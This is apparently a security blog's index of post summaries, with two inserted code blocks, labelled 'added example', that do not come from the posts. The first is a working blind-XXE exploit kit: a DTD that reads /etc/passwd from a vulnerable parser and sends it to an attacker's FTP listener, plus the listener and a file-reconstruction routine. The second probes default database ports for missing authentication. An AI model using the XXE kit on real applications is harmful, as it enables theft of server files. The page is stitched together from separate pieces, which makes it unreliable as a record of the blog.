metatrapd - Metadata and honeypots

Using a honeypot/honeyservice/honeytoken is one of the simplest and most impactful security actions one can take. Thinkst Canary has proven this over a number of years and continues to lead the field. Taking inspiration from what Thinkst has done and combining this with their idea of "honey tokens" for cloud services, I wrote metatrapd a couple of years back. Finally I'm making this public; maybe it will be useful to someone....

January 4, 2024 · 3 min · 516 words · Etienne Stalmans

XXE FTP Server - A {web,ftp}-server for XXE

XXE - FTP OoB basics. XXE offers a great attack avenue for reading files from a vulnerable web app. One of my favourite XXE attacks involves protocol handler abuse, where you use FTP to do an out-of-band read. This is useful in those cases where you have XXE but it is blind. Unlike the normal OoB retrieval through HTTP, FTP works with newer versions of Java (>1.7) and there are fewer characters which break the retrieval....

December 11, 2016 · 3 min · 567 words · Etienne Stalmans
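The blind-XXE-over-FTP technique sketched above, as an added example (not the post's own xxe-ftp-server code): the external DTD that turns the target file into an ftp:// URL, and a listener that answers every command with a success code and records the path the parser's FTP client walks. Serving the DTD over HTTP is left out; the listener host, port, verb list and the simulated victim client are assumptions for this example.

```python
import socket
import socketserver
import threading

# FTP verbs that belong to the session itself rather than to the leaked path.
PROTOCOL_VERBS = {"USER", "PASS", "TYPE", "PASV", "EPSV", "PORT", "EPRT", "SYST", "QUIT"}


def build_dtd(listener_host: str, listener_port: int, target: str = "file:///etc/passwd") -> str:
    """External DTD the vulnerable parser is made to fetch.  %file; is expanded inside the
    ftp:// URL, so the parser's FTP client carries the file contents in the path it asks for."""
    return (
        f'<!ENTITY % file SYSTEM "{target}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '
        f"'ftp://{listener_host}:{listener_port}/%file;'>\">\n"
        "%eval;\n"
        "%exfil;\n"
    )


class ExfilHandler(socketserver.StreamRequestHandler):
    """Accept anything the client says and record every command line as it arrives."""
    timeout = 10

    def handle(self):
        self.wfile.write(b"220 xxe-ftp ready\r\n")
        while True:
            raw = self.rfile.readline()
            if not raw:
                break
            line = raw.rstrip(b"\r\n").decode("utf-8", "replace")
            self.server.captured.append(line)
            verb = line.split(" ", 1)[0].upper()
            if verb == "USER":
                self.wfile.write(b"331 any password will do\r\n")
            elif verb == "QUIT":
                self.wfile.write(b"221 bye\r\n")
                break
            else:
                # A success code keeps the client walking the path; no data channel is ever opened.
                self.wfile.write(b"230 ok\r\n")


class ExfilServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, address):
        super().__init__(address, ExfilHandler)
        self.captured = []


def start_listener(host="127.0.0.1", port=0):
    """Start the listener in a background thread; port 0 lets the OS pick a free port."""
    srv = ExfilServer((host, port))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def reconstruct(captured):
    """Best-effort re-join of the leaked file: each CWD/RETR argument is one '/'-separated
    path segment, and a line that is not an FTP verb is the remainder after a newline that
    sat inside the file (the newline terminated the previous command early)."""
    out = ""
    for line in captured:
        verb, _, arg = line.partition(" ")
        if verb.upper() in PROTOCOL_VERBS:
            continue
        if verb.upper() in ("CWD", "RETR"):
            out += ("/" if out else "") + arg
        else:
            out += "\n" + line
    return out


def simulate_victim(port, lines, host="127.0.0.1"):
    """Constructed stand-in for the victim parser's FTP client: send each command line
    and collect the listener's reply codes (only used to exercise the listener offline)."""
    replies = []
    with socket.create_connection((host, port), timeout=5) as s:
        f = s.makefile("rwb")
        f.readline()  # 220 greeting
        for line in lines:
            f.write(line.encode() + b"\r\n")
            f.flush()
            replies.append(f.readline().decode().rstrip("\r\n"))
    return replies


if __name__ == "__main__":
    srv, port = start_listener()
    print(build_dtd("127.0.0.1", port))
    # Constructed trail for a two-line file "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1".
    simulate_victim(port, ["USER anonymous", "PASS x@", "CWD root:x:0:0:root:", "CWD root:",
                           "CWD bin", "RETR bash", "daemon:x:1:1", "QUIT"])
    srv.shutdown()
    srv.server_close()
    print(reconstruct(srv.captured))
```

Point the DTD at a host the target can reach, then watch `captured`; the file arrives on the command channel alone, which is why no PASV/PORT handling is needed and why a newline in the file merely splits it across two recorded lines instead of aborting the request.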

tcpprox - An intercepting TCP proxy

On numerous occasions I've run into custom binary network protocols that I've wanted to reverse. The usual go-to here is to fire up Wireshark/tcpdump and view the traffic as it goes across the wire. This works really well in most cases, but what about traffic that is encrypted with TLS? Unless you have the server's private key (and even then only for cipher suites without forward secrecy), you are stuck with viewing encrypted traffic in Wireshark. Not ideal for reverse engineering....

December 11, 2016 · 7 min · 1329 words · Etienne Stalmans

Viewing, modifying and replaying websockets

A few assessments back I ran into a web app that made liberal use of websockets. Now it's been a while since encountering an app that makes use of websockets for such a large portion of its content, and I'd forgotten what a PITA it can be trying to intercept and replay websocket requests. Seeing as it was a web app assessment, I naturally turned to trusty Burp Suite Pro. Burp has supported websockets for a long while now, but as far as I could find, this support only allowed you to intercept websocket requests and view/modify them....

September 10, 2015 · 2 min · 320 words · Etienne Stalmans

Hipsters and data

A while back I spent some time playing with the "modern" database implementations, more affectionately known as hipster tech. These are mostly your so-called NoSQL, big-data, etc. databases. Trying to interact with these databases required numerous scripts to be written, one for each database implementation. After chatting to @PaulWebSec I decided to merge these into a single tool. Thus HippyDB Tool was born. The following databases are supported: Aerospike, Cassandra, Hbase, Hive, Memcached, Mongodb, Redis and Riak. A quick scan of AWS and Google Cloud hosting showed that the vast majority of these databases are deployed on default ports, listening on all interfaces and, most critically, without any authentication....

June 14, 2015 · 2 min · 377 words · Etienne Stalmans
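The check behind that scan result, as an added example (not HippyDB's own code): connect to a store's default port, issue one harmless command without credentials, and classify the reply as served-without-auth, auth-required, or closed. The port table, the Redis/Memcached probe strings and the canned-reply server used to exercise it offline are assumptions for this example.

```python
import socket
import socketserver
import threading

# Default listening ports for some of the stores named above (constructed lookup for this example).
DEFAULT_PORTS = {"redis": 6379, "memcached": 11211}

# service -> (request, reply prefix meaning "executed without credentials",
#             reply prefix meaning "authentication enforced", or None if the text protocol has no such reply)
PROBES = {
    "redis": (b"PING\r\n", b"+PONG", b"-NOAUTH"),
    "memcached": (b"version\r\n", b"VERSION", None),
}


def probe(host, port, request, open_prefix, auth_prefix=None, timeout=3.0):
    """Send one command and classify the first reply.  Returns one of
    'open', 'auth-required', 'unexpected', 'no-reply', 'closed'."""
    try:
        s = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return "closed"
    with s:
        try:
            s.sendall(request)
            reply = s.recv(256)
        except OSError:
            return "no-reply"
    if not reply:
        return "no-reply"
    if reply.startswith(open_prefix):
        return "open"  # the command ran: anyone on the network can talk to this store
    if auth_prefix is not None and reply.startswith(auth_prefix):
        return "auth-required"
    return "unexpected"


def audit(host, ports=None):
    """Probe every known service on `host`; `ports` overrides DEFAULT_PORTS per service."""
    ports = {**DEFAULT_PORTS, **(ports or {})}
    results = {}
    for service, (request, open_prefix, auth_prefix) in PROBES.items():
        results[service] = probe(host, ports[service], request, open_prefix, auth_prefix)
    return results


class _CannedHandler(socketserver.StreamRequestHandler):
    """Constructed stand-in for a store: read one line, answer with a fixed reply."""
    def handle(self):
        self.rfile.readline()
        self.wfile.write(self.server.reply)


class CannedServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, reply, host="127.0.0.1"):
        super().__init__((host, 0), _CannedHandler)
        self.reply = reply
        threading.Thread(target=self.serve_forever, daemon=True).start()

    @property
    def port(self):
        return self.server_address[1]


if __name__ == "__main__":
    # Two constructed "Redis" instances: one wide open, one with requirepass set.
    open_redis = CannedServer(b"+PONG\r\n")
    locked_redis = CannedServer(b"-NOAUTH Authentication required.\r\n")
    print("open  :", audit("127.0.0.1", {"redis": open_redis.port, "memcached": 1})["redis"])
    print("locked:", audit("127.0.0.1", {"redis": locked_redis.port, "memcached": 1})["redis"])
    for srv in (open_redis, locked_redis):
        srv.shutdown()
        srv.server_close()
```

Run `audit()` against a host you are authorised to test; an `open` verdict on a cloud instance is exactly the exposure the scan above describes, and the fix is the usual pair of binding the service to a private interface and turning on authentication.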